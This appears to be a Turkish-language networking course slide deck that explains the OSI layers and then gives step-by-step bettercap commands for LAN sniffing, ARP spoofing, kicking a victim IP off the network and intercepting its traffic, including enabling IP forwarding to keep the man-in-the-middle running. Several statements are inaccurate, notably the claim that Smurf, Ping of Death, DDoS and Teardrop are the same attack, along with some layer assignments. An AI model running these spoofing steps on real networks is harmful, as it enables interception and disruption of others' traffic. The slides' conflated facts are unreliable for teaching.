CHAPTER 5

NETWORK
FUNDAMENTALS
 CHAPTER 5:
NETWORK
FUNDAMENTALS
TERMINOLOGY

OSI Reference Model

• 7-Application Layer
• 6-Presentation Layer
• 5-Session Layer
• 4-Tranport Layer
• 3-Network Layer
• 2-Data Link Layer
• 1.Phycial Layer
CHAPTER 5:
NETWORK FUNDAMENTALS
OSI REFERENCE MODEL
(OSI - Open Systems Interconnection)
• ISO (International Organization for Standardization) tarafından
geliştirmiştir.
• Açık Sistemler Arası Bağlantı, ağda bulunan bütün cihazların
veriyi nasıl göndereceğini, alacağını ve yorumlayacağını
belirleyen bir standardizasyon sağlar.
• OSI modeli yandaki şemada gösterilen yedi katmandan oluşur.
Her katmanın farklı sorumlulukları vardır ve Katman 7'den
Katman 1'e kadar düzenlenmiştir.
• Verilerin geçtiği her ayrı katmanda belirli süreçler gerçekleşir
ve bu verilere bilgi parçaları eklenir.
• Verilere her katmanda bir bilgi eklenmesi işlemine
kapsülleme-encapsulation denir.
• Her katmanda veri iletimini sağlayan farklı protokoller bulunur.
CHAPTER 5:
NETWORK FUNDAMENTALS

OSI Reference Model Layers

CHAPTER 5:
NETWORK FUNDAMENTALS
Physical Layer
• OSI modelinin en alt veya ilk katmanıdır.
• Bu katmanda veriler bitler halindedir. Bu katman Bit’leri
bir bilgisayardan diğerine iletir ve bağlantıyı yönetir.
• Bu katmandaki protokoller, bir ağ ortamı üzerinden veri
iletmek ve almak için sinyaller üretir ve algılar.
• Fiziksel katman NIC-Network Interface Card, Ethernet
cable, coaxial cable, optic cable vb fiziksel elemanlardan
oluşur.
• Bu katmanda veriler bitlerden oluşur. Bitlerin
çözümlenmesi bu katman üzerinde gerçekleşir. Çözülen
bitler de dijital veyahut analog sinyaller halinde
gönderilmesi sağlanır.
• Genel olarak bu katmanda ham veri işlenir.
• Verinin türü veyahut hedefi gibi hiçbir bilgiye ve ayrıca
veridaki hatalara burada bakılmaz.
CHAPTER 5:
NETWORK FUNDAMENTALS

Data Link Layer

• Birincil işlevi, Ağ katmanından aldığı verileri daha sonra
Fiziksel katman tarafından iletilebilecek
çerçevelere/frameslere bölmektir. Başka bir deyişle
bit’leri çerçeve olarak paketler ve teslimatı kontrol eder
• Kablolu veya kablosuz ethernet kartımızın MAC adresini
aldığımız ve ayrıca ARP protokolünün çalıştığı katman
burasıdır.
• Fiziksel katmanda meydana gelebilecek hataları tespit
eder ve bu hataların mümkün olduğunca düzeltildiği
katmandır.
• Bu katman üzerinde fiziksel olarak bağlı iki cihaz
arasında bağlantı kurmayı ve bu bağlantıyı sonlandırmayı
sağlayan yan tarafda da görüntülenen protokoller çalışır.
CHAPTER 5:
NETWORK FUNDAMENTALS

Network Layer
• Ağ katmanı IP adresinin cihazlara tanımlandığı katmandır.
Bu işleme mantıksal adresleme - logical addressing de
denir.
• Bu katmandaki protokoller ağ adreslerini fiziksel
karşılıklarına çevirir (IPMAC) ve verilerin göndericiden
alıcıya nasıl yönlendirileceğine karar verir.
• Data link katmanında paketlenen veriler bu katmanda
taşınmaya başlar.
• Switching ve routing cihazları bu katmanda çalışmaktadır.
Bu katman sayesinde verinin router aracılığıyla
yönlendirmesi/aktarımı sağlanır. Switch ile de ağa bağlı
bütün cihazların bir biri ile haberleşmesi sağlanır.
• Bu katmanda kullanılan protokoller ise IP, ARP, RARP,
BOOTP, ICMP olarak sıralanabilir.
• Ağ katmanında veri iletiminin güvenli bir şekilde
gerçekleştirileceğinin garantisi verilmez.
CHAPTER 5:
NETWORK FUNDAMENTALS

Transport Layer
• Taşıma/iletim katmanı, oturum katmanından aldığı verinin uçtan uca taşınmasını sağlar.
• Paketlerin parçalara bölünüp birleştirilmesini ve hata kontrolünün güvenliğinden
sorumludur.
• Paketleme, büyük verileri küçük verilere bölme işlemlerinin bütünüdür.
• Transport katmanında paket hata ile karşılaşırsa, tekrardan gönderilir. Bu şekilde uçtan
uca veri iletiminin tutarlılığını sağlar.
• Paketin karşı tarafa gidip gitmediğinin kontrol edildiği katmandır ve port ayrımının
yapıldığı, hangi portun hangi uygulamayı dinlediğinin belirlendiği katman olarak bilinir.
• Firewall, Gateway, Load Balancer ekipmanları bu katmanda çalışır.
• Aşağıdaki protocoller bu katmanda çalışır:
• TCP (Transmission Control Protocol)
• UDP (User Datagram Protocol)
• SPX
• ESP
• Fiber Channel Protocol
• iSCSI
• SCTP
• GRE
• HSRP, VRRP, …
CHAPTER 5:
NETWORK FUNDAMENTALS

Session Layer
• Oturum katmanı, cihazlar arasındaki bağlantıları kontrol
eder. Yereldeki ve uzaktaki bağlantıları kurabilir, yönetebilir
veya sonlandırabilir.
• Bir makine üzerindeki işletim sisteminin müşterilerinin,
başka bir makine üzerindeki işletim sisteminin
müşterileriyle oturum açmasını ve iletişimini sağlar.
• Oturum katmanı çoğunlukla uzak yordam çağrısını kullanan
uygulama ortamlarında kullanılır.
• Bu katmanda kullanılan servislere SQL, Netbios, NFS
örnek olarak verilebilir.
• Bu katmanda sunum katmanına yollanacak veriler farklı
oturumlarla birbirinden ayrılarak yapılır.
• NetBIOS, RPC, Named Pipes ve Sockets gibi protokoller
bu katmanda çalışır.
CHAPTER 5:
NETWORK FUNDAMENTALS

Presentation Layer
• Sunum katmanı, uygulama katmanındaki varlıkların arasındaki iletişim
ortamının, farklı donanım işletim sistemleri bazında, gerçekleşmesini
sağlar.
• Sunum katmanının en önemli görevi yollanan verinin karşı bilgisayar
tarafından anlaşılacak şekilde çevrilmesidir. Bu sayede farklı
programların birbirlerinin verisini kullanabilmesi mümkün hale
getirilir.
• Sunum katmanı uygulama katmanına verileri yollar daha sonra bu
katmanda verinin yapısı, biçimi ile ilgili düzenlemeler yapılır. Verinin
formatı belirlenir. Ayrıca verinin şifrelenmesi, açılması, sıkıştırılması
da bu katman üzerinde gerçekleştirlir.
• GIF, JPEG, TIFF, EBCDIC, ASCII bu katmanda çalışır.
• Sunum katmanı, verileri uygulamaların kabul edeceği hale dönüştürür.
• Bu katman veriyi biçimlendirip şifreleyerek ağda gönderilmesini
sağlar. Bu yüzden syntax katmanı olarak da bilinir.
CHAPTER 5:
NETWORK FUNDAMENTALS

Application Layer
• Uygulama katmanı, kullanıcının gönderilen veya alınan verilerle
nasıl etkileşime girmesi gerektiğini belirleyen protokollerin ve
kuralların bulunduğu katmandır.
• Kullanıcıların gönderilen veya alınan verilerle etkileşime girmesi
için bilgisayar uygulamaları ile ağ arasında bir arabirim sağlar.
• OSI katmanları arasında diğer katmanlara servis sağlamayan tek
katmandır.
• SSH, telnet, FTP, TFTP, SMTP, SNMP, HTTP, DNS protokolleri
ve tarayıcılar bu katman üzerinde çalışır.
• Kaynak kullanılabilirliğine karar verirken, uygulama katmanı
ağın yeterli olup olmadığına ya da istenilen bağlantının var olup
olmadığına karar vermektedir.
• Kullanıcı yetkilendirme ve gizlilik dikkate alınır.
CHAPTER 5:
NETWORK FUNDAMENTALS

Network Protocols & OSI Reference Model

CHAPTER 5:
NETWORK FUNDAMENTALS

Responsibility Of OSI Reference Model Layers

CHAPTER 5:
NETWORK FUNDAMENTALS

Heart Of OSI Reference Model

CHAPTER 5:
NETWORK FUNDAMENTALS

Cyber Security Aspect Of OSI Model

CHAPTER 5:
NETWORK FUNDAMENTALS

Sniffing With Bettercap

Step 1……bettercap (–iface eth).……..bettercap i aç
Step 2……net.probe on…………………...bettercap ip mapping bileşenini aç
Step 3……net.show…………………....……ipleri tablo halinde görüntüle
Step 4……net.sniff on ……………...…….sniff işlemini başlat
Step 5……set net.sniff.local true………tüm ağı ve tüm paket türlerini tara
CHAPTER 5:
NETWORK FUNDAMENTALS

ARP Spoofing / Deauthentication Attack With Bettercap (Banning)

Uygulamaya başlamadan önce sağlıklı sonuçlar alabilmek için mutlaka CTRL+SHIFT+DELETE tuş kombinasyonu ile
tarayıcı ön belleğini temizleyiniz.

Step 1……ifconfig / ip addr……………………….......…Network interface ve network IP adresini görüntüle

Step 2..….nmap 192.168.1.0/24…………….…...……Kurban IP adresini belirle
Step 3……bettercap ………...……….....…………………..Bettercap i aç
Step 4……set arp.spoof.fullduplex true………….....Hem modem hem de kurban makineye arp göndermeyi etkinleştir
Step 5……set arp.spoof.targets 192.168.1.214…..Target parametresine kurban IP’sini ata
Step 6……arp.spoof on…………………………….........…Arp spoof saldırısını başlat
Step 7……arp.ban on………………………………………….Hedefi yetkisizleştir
Step 8……arp.ban off……………………………………….…Yetkisizleştirmeyi kapat
Step 9……arp.spoof off / exit……………………........Arp spoof sadırısını kapat / bettercap’ten çık
CHAPTER 5:
NETWORK FUNDAMENTALS

ARP Spoofing / ARP Poisoning / MAC Spoofing / ARP Based Sniffing Attack With Bettercap
Uygulamaya başlamadan önce sağlıklı sonuçlar alabilmek için mutlaka CTRL+SHIFT+DELETE tuş kombinasyonu ile
tarayıcı ön belleğini temizleyiniz.
Step 1……bettercap ……………….………...………….....…Bettercap i aç
Step 2……net.probe on…………………………………........IP mapping yap
Step 3……net.show………………………………….…...........IP Map ı aç
Step 4……set arp.spoof.fullduplex true…………….....Modem/router a arp gönder
Step 5……set arp.spoof.targets 192.168.1.214……..Hedef IP adresine arp gönder
Step 6……arp.spoof on……………………………….........…Arp Spoofing i başlat
Step 7……net.sniff.local true………………………........…Local ağdan gelen bütün paketleri dikkate alır.
Step 8...…net.sniff on……………………………….........…..Sniffing işlemini başlat
Step 9…...arp.spoof off / exit………………...….....……Arp Spoofing i kapat
CHAPTER 5:
NETWORK FUNDAMENTALS

ARP Spoofing / ARP Poisoning / MAC Spoofing / ARP Based Sniffing Attack With Bettercap

Not:
• Uygulama İçin Örnek Site: http://unicornitems.com
• Kurban internete giremezse 11. adım olarak terminal üzerinden IP_Forward işlemi yapmak gerekebilir.
Terminal üzerinde aşağıdaki komutu çalıştırın.
echo 1 > /proc/sys/net/ipv4/ip_forward
• ISP firmaları http protokolü kullanan sitelere erişim izni vermemekte ya da bu sitelere erişimi kısıtlamaktadır.
• Bettercap ekranın arama yapmak CTRL+SHIFT+F
CHAPTER 5:
NETWORK FUNDAMENTALS

Man In The Middle : ARP Spoofing+Sniffing

Smurf Attack = Ping Of Death = DDoS Attack = Teardrop Attack
CHAPTER 5:
NETWORK FUNDAMENTALS